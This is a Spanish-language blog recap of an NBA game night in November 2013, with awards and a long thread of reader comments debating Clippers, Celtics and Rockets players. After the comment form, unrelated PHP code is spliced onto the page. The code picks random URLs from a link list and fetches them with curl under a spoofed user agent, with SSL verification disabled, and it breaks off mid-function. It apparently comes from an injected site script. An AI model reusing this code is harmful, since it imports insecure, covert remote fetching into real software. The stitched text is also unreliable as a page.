La Crónica: Marcando el paso

12 de November de 2013 por Simon

Nueve partidos se disputaron ayer entre los que destacan una nueva victoria de Indiana que continúa invicto y marcando el ritmo de la competición, el triunfo ajustado de Clippers sobre los Wolves, el paso firme de los Spurs  y las dos prórrogas que necesitó Houston Rockets para doblegar a Toronto Raptors.

El partidazo de la jornada era sin duda la visita de los Wolves al Staples para enfrentarse a los Clippers. El partido no decepcionó y ofreció un bonito duelo entre dos equipos que aspiran a conseguir el título de campeón de conferencia y disputar el anillo. El duelo fue muy igualado con Blake Griffin (25-10-5) y Paul (21-11) como jugadores más destacados entre los locales. Los brutales partidos de Love (23-19-7) y Martin, autor de 30 puntos, sostenían por su parte a los Wolves. Un triple desde su campo de Jamal Crawford al final del tercer cuarto y un buen comienzo del último, parecían dar a Clippers la ventaja suficiente para tener un final de encuentro plácido pero a falta de 4 minutos un air ball desde el tiro libre de DeAndre Jordan espoleó a los Wolves que redujeron la ventaja de 11 a 2 puntos en apenas 2 minutos. En la última jugada del partido los de Adelman desaprovecharon la oportunidad de mandar el partido a la prórroga en hasta tres ocasiones. Un tiro muy forzado de Martin, rebote y otro tiro fallado de Pekovic y el palmeo de Love no quisieron entrar por lo que la victoria se quedó en Los Ángeles (107-109).

La jornada había comenzado con un interesante partido en el que se medían dos equipos situados en zona de Playoffs como son Atlanta Hawks y Charlotte Bobcats. Ni la vuelta de Al Jefferson, ni tener hasta 7 jugadores en dobles figuras de anotación sirvió a Charlotte para ganar un partido que dominaba hasta el tercer cuarto en el que los Hawks rompieron la baraja y consiguieron una ventaja que administraron en el último cuarto sin problemas. Los Hawks, que se colocan segundos de conferencia, tuvieron a Horford con 24 puntos y al sorprendente Cartier Martin con 16 a sus máximos anotadores (103-94). Con esta victoria los Hawks se colocan segundos de la igualadísima conferencia Este, una conferencia que sigue dominando con mano de hierro los imbatidos Pacers a los que ayer les tocó destrozar a unos impotentes Grizzlies a los que ayer dejaron en unos escasos 79 puntos. El sorprendente Lance Stephenson, que cada día juega mejor y es más importante para los Pacers, consiguió un triple doble para liderar a su equipo a la octava victoria consecutiva. Según cuentan desde Indiana, el propio Lance Stephenson ya dijo al principio de temporada que quería empezar la regular season con 10 victorias consecutivas. El objetivo está cada vez más cerca. Ante la explosión de juego de Lance Stephenson, el “MVP” de lo que va de temporada, Paul George, pudo relajarse y anotar sólo 23 puntos y coger 7 rebotes (79-95). 

La victoria de Indiana sobre Memphis fue ayer la única que pudo sumar la conferencia Este ante los equipos del Oeste.  Popovich y sus muchachos no quisieron dar ni una opción a los Sixers y les dejaron en 13 puntos al final del primer cuarto a pesar de no contar con Tim Duncan. Hasta ocho jugadores de los Spurs consiguieron 8 o más puntos para contribuir a la cómoda victoria. Por parte de Philadelphia el más destacado en la derrota fue Spencer Hawes con 17 puntos y 13 rebotes (109-85). El equipo que no termina de convencer a nadie son los Houston Rockets, que ayer tuvieron muchos problemas para deshacerse de Toronto Raptors a pesar de ir dominando el marcador durante todo el encuentro y acumular una renta de 10 puntos en el último cuarto. En la primera prórroga Houston llegó al final mandando de tres puntos pero Rudy Gay forzó la segunda con un espectacular triple. Ya en la segunda, Toronto se apagó en el último minuto y Houston pudo cerrar el partido. Brutal doble-doble de Howard con 18 puntos y 24 rebotes además de 5 tapones aunque como siempre con el punto negro de los tiros libres, en los que falló 8 de los 12 que intentó. 26 puntos y 10 asistencias para Harden y 31 puntos para Jeremy Lin que ayer estuvo bastante inspirado. En Toronto, Rudy Gay precisó de 37 tiros para irse a 29 puntos (104-110). En Oregon, Portland hizo valer su localía ante Detroit Pistons. Lillard y Aldridge estuvieron en su línea con 25 y 18 puntos pero lo sorprendente fue la aportación de Robin Lopez con 17 puntos y 10 rebotes en lo que es su segundo doble-doble consecutivo muestra de que empieza a encontrar su sitio en el Moda Center. Por parte de Detroit, enorme doble-doble de Drummond con 16 puntos y otros tantos rebotes con 8/9 en el tiro, igualito que Jennings o Stuckey que necesitaron de 24 y 15 tiros para irse a 28 y 13 puntos respectivamente (103-109).

El resto de partidos de ayer siguieron más o menos el guión marcado. Chicago venció a Cleveland en un duelo de bases que buscan encontrar su mejor juego puesto que ni Irving ni Rose han comenzado la temporada de la mejor forma. Rose terminó  el partido en el banco con molestias en su rodilla. Dunleavy desde el banco y Boozer lideraron la anotación de los Bulls para lograr la victoria (81-96). El duelo de colistas del Oeste se lo llevó Denver Nuggets ante unos Jazz que siguen sin estrenarse esta temporada y ya acumulan 8 derrotas. A pesar del marcador (100-81) el partido discurrió igualado hasta el último cuarto en el que Utah desapareció de la cancha.  Lawson y Faried con un doble-doble cada uno fueron los más destacados. Para terminar, Boston consiguió su cuarta victoria consecutiva ante Orlando Magic (105-120) en un partido muy bonito e interesante con ambos equipos practicando un juego muy coral que permitió hasta a 14 jugadores anotar más de 10 puntos.

PREMIOS

MVP: El 4 de 12 que ha marcado Dwight Howard en los tiros libres nos tienta de no mencionarle en esta sección a pesar de los 18 puntos, 24 rebotes y 5 tapones que ha conseguido esta noche. Su compañero Jeremy Lin ha estado muy acertado con 31 puntos, algunos en momentos muy calientes de las prórrogas. Blake Griffin ha sido el mejor de los Clippers con 25 puntos, 10 rebotes y 5asistencias a pesar de enfrentarse a Love&Pekovic y Lance Stephenson se ha ido a casa con el primer triple doble de su carrera (13p-11r-12a).

Rookie: Kelly Ollynyk empieza a carburar. Ante Orlando consiguió 16 puntos, 7 rebotes y 5 asistencias. En el mismo partido Victor Oladipo anotó 17 puntos aunque con un 7 de 17 en tiros de campo.

Sorpresa: A Jordan Crawford le han encargado dirigir a los Celtics y está respondiendo a la perfección. Ayer anotó 16 puntos con buenos porcentajes, capturó 5 rebotes y repartió 10 asistencias.

Decepción: Mal día para Kyrie Irving que anotó sólo 5 sus 19 intentos y perdió 3 balones. Su compañero Jarrett Jack no anotó ninguno de los 6 tiros que intentó. Mike Conley tampoco tuvo el día. Ante los líderes sólo pudo aportar 11 puntos y 2 asistencias.

Esfuerzo en vano: La pareja Kevin Love Nikola Pekovic ha apretado bien las tuercas a los Clippers. Si el primero se ha ido a los 29 puntos, 17 rebotes y 7 asistencias, el segundo ha anotado 25 puntos (11 de 15 en tiros) y ha capturado 10 rebotes. Andre Drummond tampoco se ha llevado la victoria a pesar de sus 16 puntos (8 de 9)  y 16 rebotes.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

40 comentarios a esta entrada

  1. txusma dice:
    #1

    Si el mate de JJ Hickson lo hace un jugador más consolidado (alguien ha dicho Griffin?) es número 1 claro y candidato a las jugadas del año. Un poster a 2 manos con una fuerza bestial. Mirad donde acaba Williams…

      Citar

  2. Laker1624 dice:
    #2

    Ya podemos decir abiertamente y sin discusión alguna que Blake Griffin es claramente superior a Love porque le ha ganado un partido en su cara, y no solo ha hecho mates el hombre, también ha tenido sus jugaditas de espaldas a canasta y tal.

    Así que damos por cerrado el debate sobre si Blake Griffin sirve como segunda espada, como sable láser o si no sirve ni para cortar mantequilla.

      Citar

  3. Josgel dice:
    #3

    Vaya inicio de temporada de Jeff Teague con 17 puntos y 10 asistencias de media. Junto a Horford y el buen juego de equipo que ha traído Budenholzer para mi, una sorpresa agradable.

    En cuanto a los números de los bases; hoy Rubio 5 puntos, 10 asistencias y +12 en +/- y pierde el partido, Paul 21 puntos, 11 asistencias y -6 y gana el partido. ¿Cual es mejor base en base a ellos?

      Citar

  4. franitis dice:
    #4

    Simon;: Sorpresa: A Jordan Crawford le han encargado dirigir a los Celtics y está respondiendo a la perfección. Ayer anotó 16 puntos con buenos porcentajes, capturó 5 rebotes y repartió 10 asistencias.

    Pero además con 0 pérdidas de balón. Ya lo comenté anteriormente, el cambio de dirección en el juego le ha dado alas a los Celtics, hasta el punto que el alejar a Bradley del puesto de PG le ha liberado como 2 en este partido yéndose a los 24 puntos, con 3 robos de balón y desquiciando a Jammer Nelson con su defensa, con un nivel que mejor que en su gran temporada 11/12. Y Crawford parece que se ha decidido a dirigir el juego y no marcarse esos tiros desde su casa sin criterio alguno. Encantado con la pareja que forman Olynyk y Sulli, ¡con 2/3 en triples para el canadiense! Y Celtics al 50% de victorias, ya lo dije en el análisis de Celtics; temporada ilusionante y desilusionante según se mire 0-4… 4-4… Ojalá sigan dando alegrías.

      Citar

  5. Esteban dice:
    #5

    Laker1624:
    Ya podemos decir abiertamente y sin discusión alguna que Blake Griffin es claramente superior a Love porque le ha ganado un partido en su cara, y no solo ha hecho mates el hombre, también ha tenido sus jugaditas de espaldas a canasta y tal.

    Así que damos por cerrado el debate sobre si Blake Griffin sirve como segunda espada, como sable láser o si no sirve ni para cortar mantequilla.

    si enorme cierre de partido de los Clippers con Griffin comandando, como el uno contra uno que se jugo en la ultima ofensiva, vaya efectividad, sin dudas el debate esta cerradisimo jajaja

    ah terrible nuevo trriple doble de ricky, ¿ah no repitio? jajaja

    saudos Laker1624

      Citar

  6. Esteban dice:
    #6

    impresionante Hibbert, la proxima vez que los Grizzlies deban enfrentar a indiana, sus jugadores van a estar temblando desde el dia anterior

      Citar

  7. Luis H. dice:
    #7

    Creo que el problema de Houston tiene un nombre y se llama cansancio. McHale mete unas palizas tremendas a sus titulares y no confía en jugadores que le podrían rendir, como Motiejunas o Ronnie Brewer. Ayer jugó prácticamente con ocho los 58 minutos. Inexplicable y lo pueden pagar a final de año

      Citar

  8. Esteban dice:
    #8

    Luis H.:
    Creo que el problema de Houston tiene un nombre y se llama cansancio. McHale mete unas palizas tremendas a sus titulares y no confía en jugadores que le podrían rendir, como Motiejunas o Ronnie Brewer. Ayer jugó prácticamente con ocho los 58 minutos. Inexplicable y lo pueden pagar a final de año

    el problema de Houston es que no tienen un ala pivote de miniomas garantias y McHale ya dejo claro el año pasado que no confia en Jones o Montiejunas, por otra parte, tampooc tienen un base solido

    y quiza suene aventurado, pero el arranque de temporada de Harden, mas alla de sus puntos en bruto, ah necesitado de muchos lanzamientos para alcanzarlos, con un porcetaje muy bajo, ademas de perder varios balones
    no se, la dupla Harden-Howard, si bien puede coexistir perfectamente, a la vez no creo que sean el uno para el otro

      Citar

  9. Laker1624 dice:
    #9

    Esteban: el problema de Houston es que no tienen un ala pivote de miniomas garantias y McHale ya dejo claro el año pasado que no confia en Jones o Montiejunas, por otra parte, tampooc tienen un base solido

    y quiza suene aventurado, pero el arranque de temporada de Harden, mas alla de sus puntos en bruto, ah necesitado de muchos lanzamientos para alcanzarlos, con un porcetaje muy bajo, ademas de perder varios balones
    no se, la dupla Harden-Howard, si bien puede coexistir perfectamente, a la vez no creo que sean el uno para el otro

    Lo del ala-pivot lo pueden solucionar facilmente, que se ponga McHale a jugar y punto.

    A mi tampoco me convence la doble H de Houston. Yo creo que el punto fuerte de Harden son las penetraciones a canasta, y a la vez la pintura es el único lugar en el que Dwight puede hacer daño, así que si éste se alejara de canasta para dar via libre a los jugadores exteriores se volvería un jugador practicamente nulo en ataque. Aunque también veo que son dos jugadores que pueden ejecutar el Pick&Roll bastante bien.

      Citar

  10. HisRoyalAirness dice:
    #10

    Para mí lo único que queda demostrado de Griffin es que un tipo que salta 30 cm menos que él le ha cogido 19 rebotes en las fauces.

    Y sí Esteban, Ricky es un paquete, pero viste el partido de Irving? Lamentable. Ese sí que maquilló. Que sigas con lo del triple doble es para desterrarte

      Citar

  11. Laker1624 dice:
    #11

    Esteban: si enorme cierre de partido de los Clippers con Griffin comandando, como el uno contra uno que se jugo en la ultima ofensiva, vaya efectividad, sin dudas el debate esta cerradisimo jajaja

    ah terrible nuevo trriple doble de ricky, ¿ah no repitio?jajaja

    saudos Laker1624

    A ver si Ricky va a tener que estar haciendo triples-dobles cada día, que tampoco es Oscar Robertson (de momento), que yo soy muy español y me espero cualquier cosa de este chaval…

    Otro hacenúmeros es el amigo Stephenson, con un partido sin mucha historia frente a unos Grizzlies que tiene jugadores que se piran en mitad de los partidos porque se ponen de parto ¡Que no os engañen, ese triple-doble tampoco vale!

      Citar

  12. Laker1624 dice:
    #12

    HisRoyalAirness:
    Para mí lo único que queda demostrado de Griffin es que un tipo que salta 30 cm menos que él le ha cogido 19 rebotes en las fauces.

    Y sí Esteban, Ricky es un paquete, pero viste el partido de Irving? Lamentable. Ese sí que maquilló. Que sigas con lo del triple doble es para desterrarte

    Pero por esa regla de 3 todos los jugadores interiores que juegan contra Love se lo tendrían que hacer mirar, porque el tío siempre se hincha a pillar rebotes y a mi me parece que es uno de los interiores de la liga con menos que menos salta.

    La capacidad de salto es importante, pero también lo es (y mucho) la colocación y el instinto reboteador (intuir donde pueden ir a parar los rebotes y tal).

      Citar

  13. Esteban dice:
    #13

    bueno, los 19 rebotes de Love, es merito de Love y no desmerito de Griffin

    no es por nada, pero mi vapuleado analisis previo de los Clippers tan errado no estaba, de los nuevos fichajes, uno esta siendo peor que el otro

    Dudley se arrastra, Mullens apenas juega, Collison, lejos esta de dar minutos productivos de descanso a CP3, ni compararlo con Bledsoe y Jamison aun no ha debutado

    de a momento solo Redick ha estado pro sobre las expectativas, el resto por debajo

      Citar

  14. Esteban dice:
    #14

    a los que se le ha ido la mano pensando en Wiggins es al Jazz, por que no solo perdieron todos sus juegos, realmente no recuerdo uno donde hayan estado cerca de ganarlo, casi todas sus derrotas son por doble dígitos y algunas por palizas

    o Burke vuelve y es muy bueno, o al parecer les va a costar superar la marca fatídica de los bobcats hace dos años

      Citar

  15. Schize dice:
    #15

    Esteban, espera a ponerte las medallitas a final de temporada. Esto todavía está empezando.

      Citar

  16. Laker1624 dice:
    #16

    ¿Porque no ha jugado el supercrack de Bennett? Esta de baja por depresión o alguna cosa por el estilo?

      Citar

  17. Jas dice:
    #17

    Lo de Love a mi me cabrea un poco, el tío es un gran reboteador, nadie discute eso… pero he visto tres de los últimos cuatro partidos de los wolves y me da la sensación que está obsesionado con coger rebotes, llega incluso a pelearse con sus propios compañeros por coger rebotes defensivos facilísimos. Ricky ayer hizo un buen partido… no vi el partido contra los lakers pero contra warriors y mavericks estuve bastante horrible a mi parecer… su tiro sigue siendo lamentable y el caso es que sus compañeros le dejan seleccionar sus tiros y el no tiene para nada mala selección, creo que es un gran handicap porque sus defensores los flotan continuamente, pasan los bloqueos por detrás y le reducen el espacio para penetrar y meter balones en el poste.

    Odio a Blake Griffin, si veis los highlights del partido de ayer, hay una jugada en que Paul deja ”sentado” a Brewer con un crossover… se cae al suelo porque el cerdaco de Griffin le mete el pie haciendo que se caiga. Hay otra jugada en la que Brewer esta en el suelo y el tio le pasa por encima para que no pueda levantarse. Sus movimientos en el poste aunque efectivos están lejos de ser bonitos, tira de fuerza bruta y tirito a tabla, es feo de ver y además sucio.

      Citar

  18. Laker1624 dice:
    #18

    Jas:

    Odio a Blake Griffin, si veis los highlights del partido de ayer, hay una jugada en que Paul deja ”sentado” a Brewer con un crossover… se cae al suelo porque el cerdaco de Griffin le mete el pie haciendo que se caiga. Hay otra jugada en la que Brewer esta en el suelo y el tio le pasa por encima para que no pueda levantarse. Sus movimientos en el poste aunque efectivos están lejos de ser bonitos, tira de fuerza bruta y tirito a tabla, es feo de ver y además sucio.

    Yo voto porque quemen a Griffin en la plaza del pueblo!!!
    Madre mía, que el tío no es Karl Malone ya lo sabemos, pero que tampoco es el anticristo…
    ¿Que sus movimiento no son bonitos? Ni que esto fuera ballet…
    Si es que cuando alguien se os mete entre ceja y ceja no le aguantáis ni un pedo.
    Y a mi tampoco me parece tan sucio, esta jugada del crossover creo que la hemos visto aquí unos cuantos con varios jugadores. Diría que esta misma temporada paso lo mismo en el partido Heat-Bulls, en un quiebro de Cole a Rose en el que Haslem o Andersen (no lo recuerdo bien) hizo lo mismo.
    Mirad que Griffin no es santo de mi devoción y seguramete esta sobrevalorado, pero que tampoco es el nuevo Bin Laden.

      Citar

  19. Ruxixón dice:
    #19

    Hete aquí uno de los pocos que confiaban en Jordan Crawford,ya dio mejores sensaciones el año pasado en Washington que dejaban un poco atrás esa fama de mandarinero que tiene o tenía.Lo mejor de todo,como dice franitis,que Bradley juega en su posición,donde es un jugador altamente efectivo,a la vez que se le aleja lo máximo posible de la dirección,tarea en la que sufre.

    Para compensar mi labor comercial de venderos a Crawford,¿puede algún alma caritativa venderme las bondades de Rodney “La Lacra” Stuckey?Gran error de Cheeks darle tanta bola a este tio…

      Citar

  20. Denise dice:
    #20

    Ruxixón:
    Hete aquí uno de los pocos que confiaban en Jordan Crawford,ya dio mejores sensaciones el año pasado en Washington que dejaban un poco atrás esa fama de mandarinero que tiene o tenía.Lo mejor de todo,como dice franitis,que Bradley juega en su posición,donde es un jugador altamente efectivo,a la vez que se le aleja lo máximo posible de la dirección,tarea en la que sufre.

    Pues a mi me parece un cancer/morralla. Tipico jugador que para un equipo pequeño no está mal porque tiene calidad y de evz en cuando te salta con un partido bueno, pero cuando juegas en un equipo contender con 4 tios con calidad y con facilidad anotadora, un jugador como Crawford no te vale para mucho más porque no aporta en las demas facetas del juego nada nuevo que cualquier otro jugador de perfil bajo pueda aportar. Ademas de cerebro no va muy sobrado el hombre…

      Citar

  21. Denise dice:
    #21

    Esteban:

    no es por nada, pero mi vapuleado analisis previo de los Clippers tan errado no estaba, de los nuevos fichajes, uno esta siendo peor que el otro

    Dudley se arrastra, Mullens apenas juega, Collison, lejos esta de dar minutos productivos de descanso a CP3, ni compararlo con Bledsoe y Jamison aun no ha debutado

    de a momento solo Redick ha estado pro sobre las expectativas, el resto por debajo

    ¿El GM de los Clippers te ha quitado la novia? Vaya palos que le das a este equipo sin merecerlo aun.

    – A Jamison un no se le puede criticar, cuando vuelva a las pistas ya hablaremos pero un tio con su veterania, calidad y cobrando el minimo, siempre es bueno tenerlo en la plantilla.

    -Collison no es mejor que Bledsoe, pero es que los Clippers no podían retenerlo, y como suplente de Paul, Darren me parece un excelente fichaje, no está teniendo suerte pero es un tio mas que capacitado para ser el segundo base de un equipo con aspiraciones de anillo.

    -Mullens si me sorprende que juegue tan poco, pero al igual que Jamison, cobra el minimo, aunque no metiese un solo punto mas, ya me parece un excelente fichaje el firmar a ese tipo a un precio tan bajo. Ya tendrá sus buenos partidos.

    – A Dudley le exiges demasiado, estamos hablando de un tio que jugando en equipos perdedores se ha movido estos ultimos años entre los 10-12 puntos. Pues es normal que ahora en un gran equipo con jugadores como Paul, Griffin que se mueven en mas de 15 tiros por partido, ó Crawford y Redick que andaran por la decena, éste hombre tenga un rol menos protagonista en ataque. Lo importante es que defienda bien y que cuando este solo en el triple, las clave, y de momento está haciendo a mi juicio ambos apartados.

    Y por ultimo, lo mismo que le he dado muchos palos a Jordan, ahora digo que está haciendo un inicio de campaña bastante bueno, y eso sí que es una premisa fundamental para que los Clippers puedan ganar el anillo.

      Citar

  22. Esteban dice:
    #22

    Pero jamison no esta lesionado, o al menos eso tengo entendido, simplemente doc no lo pone y ya

    Sobe crawford es como thorton, puede anotar pero necesita muchos tiros y mucho la bola en sus manos y aporta poco mas en otros apartados

    Los celtics estaban interesados en marshall, muy despreciado por todos y con muchos pergaminos como creador de juego

    Lo he visto poco pero podria servirles a unos celtics sin base

      Citar

  23. franitis dice:
    #23

    A ver, que no se nos olvide que en los Celtics juega un tal Rondo, que consigue tantos triples dobles como Ricky Rubio o un poco menos XD…

    Ahora en serio; los Celtics están necesitados de alguien que administre el juego en ausencia de Rondo, y en plantilla como PG puro solo está Pressey, que es un rookie sin draftear, que a pesar de haber dejado buenas sensaciones en la SL y en pretemporada contra los Knicks, necesita adaptarse a la NBA. El año pasado Doc Rivers se obcecó en poner a Bradley de PG cuando ha demostrado sobradamente que no es su sitio, y Stevens ha tardado 4 partidos en darse cuenta de esa circunstancia.

    Crawford es un parche para usar en ausencia de Rondo, un experimento que en los últimos partidos no está saliendo mal ya que mejora la dirección del equipo y refuerza la figura de Bradley. Cuando vuelva RR será otro cantar y posiblemente Crawford salga de SG, pero mientras mantenga la cabeza sobre los hombros y se dedique a dirigir funciona bien. Ahora Denise, tanto como un cáncer… ¡Qué no es Griffin! XD

    Marshall es un PG de 1,93, 13 pick del draft de 2012, que en North Carolina no lo hizo nada mal y en Suns estuvo hasta en la D-League un par de meses, y ahora lo han liberado los Wizards tras el trade Okafor-Gortat… A lo mejor es un diamante en bruto… Pero para darle entrada los Celtics tendrían que desprenderse primero de Bogans o Brooks; que por cierto, debe haber escupido a Stevens a la cara o algo porque no ha jugado ni un solo minuto en los 8 partidos que llevamos.

      Citar

  24. yuntas dice:
    #24

    Crawford no es como Thorton, Crawford es bueno, no aporta en muchos apartados, pero si lo hiciese no seria Crawford, que es de los mejores sextos hombres de toda la liga y DeAndre Jordan esta realmente muy bien, igual que Griffin, que esta jugando bastante mejor que el año pasado. Los Clippers perdieron buenas piezas y las han reemplazado por jugadores un poco peores, pero de momento Paul, Griffin y Jordan están mucho mejor que el año pasado, Crawford sigue igual, Dudley esta mas que aceptable y Mullens deberia jugar mas, no lo veo menos que lo que era Odom el año pasado. Eso mas Doc Rivers que quiza sea el responsable de la levantada de Jordan y Griffin, que sobre que ya era un 4 de primer nivel, ahora juega mejor. Si ha podido con esos dos quiza tambien le pueda sacar mas jugo a Dudley, Reddick, Collison, Mullens y Hollins.
    Yo veo a los Clippers muy en la lucha por el anillo por encima de GSW y Minnesotta que me caen muy bien pero Clippers a priori es bastante mas.

      Citar

  25. Esteban dice:
    #25

    yuntas: e esta jugando bastante mejor que el año pasado. Los Clippers perdieron buenas piez

    yo estaba hablando de jordan Crawford no de jamal Crawford, q es palabramas mayores comparado al primero y a thorton

      Citar

  26. Esteban dice:
    #26

    franitis:

    Marshall es un PG de 1,93, 13 pick del draft de 2012, que en North Carolina no lo hizo nada mal y en Suns estuvo hasta en la D-League un par de meses, y ahora lo han liberado los Wizards tras el trade Okafor-Gortat… A lo mejor es un diamante en bruto… Pero para darle entrada los Celtics tendrían que desprenderse primero de Bogans o Brooks; que por cierto, debe haber escupido a Stevens a la cara o algo porque no ha jugado ni un solo minuto en los 8 partidos que llevamos.

    teneidno en cuenta que Marshall esta libre, y q no creo que pueda aspirar a mas que el minimo, seria una jugada de poco riesgo y dado lo que tengo entendido de el (armador puro, sin tiro estilo rondo) podria tener alguna oportunidad en este equipo de mostrar lo que vale, si es que vale algo

    sobre el trade Gortat-Okafor, me llama la atencion que en los Wizards, no juege ni un minuto Shannon Brown, esta lesionado?

      Citar

  27. Jose Luis dice:
    #27

    Pues yo estoy de acuerdo con Esteban en lo del GM de Clippers.

    Mullen y Jamison ni juegan, Dudley poquito, Reddick medio bien, y Collison nada. Ya ha demostrado de sobras que no es el Collison rookie de la lesión de Paul en los Hornets, es el Collison que perdió titularidad en Dallas en favor de oh dios, Mike James, y que no aportó prácticamente nada en unos Pacers contenders.

      Citar

  28. yuntas dice:
    #28

    pues obviamente que los Clippers no van a poder cubrir las salidas de Bledsoe y Billups con jugadores del mismo nivel. Pero es que con lo que hay Collison es de lo mejor, no hay muchos mejores bases suplentes.

      Citar

  29. yuntas dice:
    #29

    justamente se habla de que en Boston juega de base Jordan Crawford y en 76ers MCW y en LAC tienen a Paul y Collison y tres escoltas

      Citar

  30. franitis dice:
    #30

    Esteban: sobre el trade Gortat-Okafor, me llama la atencion que en los Wizards, no juege ni un minuto Shannon Brown, esta lesionado?

    Se lo han “cargado” junto con Lee y Marshall…

      Citar

  31. Esteban dice:
    #31

    franitis: Se lo han “cargado” junto con Lee y Marshall…

    mira tu, lo tengo bien catalogado como jugador de baquillo y creo que en los lakers y suns siempre respondio acorde a su salario, veremos quien lo toma

    dos jugadores de gran inicio de curso estan en el mercado segñun se comenta y a un precio bastante accesible
    afflalo, con un contrato exelente dado su productividad y en unos magic que por cualquier ronda lo largaran a fin de perder mas juegos

    turner, algo mas caro, pero creo que los 76ers no tienen interes en seguir ganando juegos,

    jeff green, lo esta haciendo bien y esta ayudando a ganar, palabra prohibida este año en boston

    viendo los inicios de Randle, Parker y Wiggins, estos 3 equpos deberian desprenderse de estas buenas piezas para perder lo mas posible ya,

    compradores? si la temporada de los Mavs le da la esperanza a Vuban que con un par de piezas pueden dar luna sorpresa en PO, lo imagino comprando a alguno de estos muchachos

      Citar

  32. Denise dice:
    #32

    Los que critican a Collison…¿podrían decirme bases suplentes mejores? Los hay, pero no muchos y menos al precio al que juega (1’9 millones de dolares al año).

      Citar

  33. Esteban dice:
    #33

    Denise:
    Los que critican a Collison…¿podrían decirme bases suplentes mejores? Los hay, pero no muchos y menos al precio al que juega (1’9 millones de dolares al año).

    por el precio coincido que no se consiguen bases mejores, pero lo que se le pudo pagar a collison es producto de los contratos altos de otros jugadores como Griffin, Jordan, Reddick, Dudley y Crawford

    no es que collison sea malo, en el analisis previo se discutio si ganaban los clippers o perdian con los cambios, dado que AHORA todos los veian como en candidato al anillo

    yo en su momento dije que no veia cambios tan positivos para considerarlos mejores que el año pasado mas alla de lo que pueda hacer Doc, y uno de esos cambios en los cuales para mi gusto salieron perdiendo, fue el de Bledose por Collison

    esto tuvo un motivo economico evidente, pero muchos consideran mejor a estos clippers que los de la pasada temporada, independientemente de lo economico

      Citar

  34. Jose Luis dice:
    #34

    Denise:
    Los que critican a Collison…¿podrían decirme bases suplentes mejores? Los hay, pero no muchos y menos al precio al que juega (1’9 millones de dolares al año).

    Shaun Livingston
    Toney Douglas
    Patrick Beverley
    Aaron Brooks
    Jordan Farmar

    Unos cuantos vaya. Aquí dejo otros, pero por unas circunstancias u otras, no podrían estar en Clippers o quizá les veáis dudosamente mejores que Collison: Norris Cole, Beno Udrih, Prigioni, Reggie Jackson, Derek Fisher, Tony Wroten, CJ Watson, Isaiah Thomas, De Colo, Cory Joseph.

      Citar

  35. TheDeerHunter dice:
    #35

    Quitando al eterno “Pescador”, por razones obvias… no considero a esos bases mejores que Collison.

      Citar

  36. Denise dice:
    #36

    Jose Luis: Shaun LivingstonToney DouglasPatrick BeverleyAaron BrooksJordan FarmarUnos cuantos vaya. Aquí dejo otros, pero por unas circunstancias u otras, no podrían estar en Clippers o quizá les veáis dudosamente mejores que Collison: Norris Cole, Beno Udrih, Prigioni, Reggie Jackson, Derek Fisher, Tony Wroten, CJ Watson, Isaiah Thomas, De Colo, Cory Joseph.

    Discrepo rotundamente. De esa lista ninguno me parece ni la mitad de bueno que Collison. El unico que me gusta es Reggie Jackson y aun es un proyecto de jugador en formación. El resto es puro relleno
    Lo de Brooks, Prigioni y De Colo es una broma?
    Amigo Jose Luis, me quieres meter morrallas con calzador y no cuela ni uno.
    Mirais a los jugadores de Clippers no con lupa, sino con microscopio

      Citar

  37. TheDeerHunter dice:
    #37

    Ah, y tema Clippers… yo me la juego. Apuesto a aquellos mismos que el año pasado me pusieron a caldo en el análisis por decir que habían empeorado al equipo, que este año mejoran en mucho al anterior y se verá en los resultados. La verdad es que es curioso aquel análisis… me sonaba algo y me dió por revisarlo ayer. No tiene desperdicio.

    Para mí no tienen fundamento las críticas que se están haciendo a los Clippers. Para tener tantas novedades me parece que están jugando bastante bien. El rendimiento de Griffin está sobresaliente por mucho que se diga, igual que el de (obviamente Paul), Crawford, Reddick y DeAndre. Barnes está tocado, si no creo que pocos dudan que estaría sumando.
    A falta de pulir la defensa, que yo tengo pocas dudas que lo harán, son el equipo más anotador de la liga, a falta de que gente como Collison, Dudley, Mullens, Green sumen algo más. Ellos efectivamente no están cumpliendo… pero esto no ha hecho nada más que empezar.

      Citar

  38. TheDeerHunter dice:
    #38

    Me está empezando a preocupar estar de acuerdo con Denise… sobre todo con esto:

    Denise: Mirais a los jugadores de Clippers no con lupa, sino con microscopio

      Citar

  39. Jose Luis dice:
    #39

    ¿Estamos hablando del mismo Collison?

    ¿El que perdió la titularidad en Dallas a manos de un Mike James con 37 años?
    ¿El que no hizo absolutamente nada en Indiana?

    Hace mucho del Collison sorprendente de Hornets, hace 4 años ya, y no ha vuelto a dar el nivel en ningún equipo.

      Citar

  40. TheDeerHunter dice:
    #40

    A ver, contextualicemos que nadie dice que Collison sea ningún superbase de élite… pero es que los comparas con cada uno.

    Esencialmente Collison ha sido titular buena parte de su carrera (concretamente 2/3 partes de los partidos que ha disputado) que es mucho más que lo que puede decir la gran mayoría de los nombrados. Jugando siempre alrededor de 30 minutos… promediando dobles dígitos en anotación con correctos porcentajes de tiro y dando sus 5 asistencias.
    Para mí si logran entonarle como jugador de rotación es un suplente más que digno… más aún diría que notable.
    De momento efectivamente no se está encontrando cómodo en ese papel, pero es pronto .

    Puntualmente es evidente que los Clippers no salen ganando en la comparación con Bledsoe, pero es que primero, dudo mucho que Bledsoe estuviera dispuesto a seguir condeanado a un rol de suplente de CP3 y, segundo, el problema salarial era Caron Butler con 8 kilos/temporada.

    Entre Butler+Bledsoe a disgusto y Reddick, Dudley y Collison a priori me quedo con lo segundo. Otra cosa es que los dos últimos no están rindiendo como se espera (todavía)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } 